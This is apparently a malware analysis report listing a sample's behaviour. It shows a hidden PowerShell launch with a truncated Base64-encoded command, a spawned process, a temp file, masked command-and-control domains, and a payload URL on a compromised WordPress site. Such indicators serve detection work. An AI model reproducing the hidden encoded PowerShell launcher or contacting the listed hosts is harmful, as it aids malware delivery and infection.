Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABIAHoAZgByAHcAYgBlAHAAagB2AHQAagA9ACcAQgBvAGwAagBzAG4AZgB2AHEAcgAnADsAJABPAHoAbwBoAHIAYQBpAHIAeQB0AGIAdABjACAAPQAgACcAOAA5ADYAJwA7ACQARABwAGoAYgB4AGEAcwB1AGk...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\1370780.cvr
- 'xx#o.tm':443
- 'ka####ajesh.london':443
- 'ma##.pollub.pl':80
- 'wo####apparel.fr':443
- http://ma##.pollub.pl/km/wp-content/plugins/no-comments-on-pages/5su-khkh2m-84/
- 'ka####ajesh.london':443
- DNS ASK xx#o.tm
- DNS ASK ka####ajesh.london
- DNS ASK ch###m2020.com
- DNS ASK ma##.pollub.pl
- DNS ASK wo####apparel.fr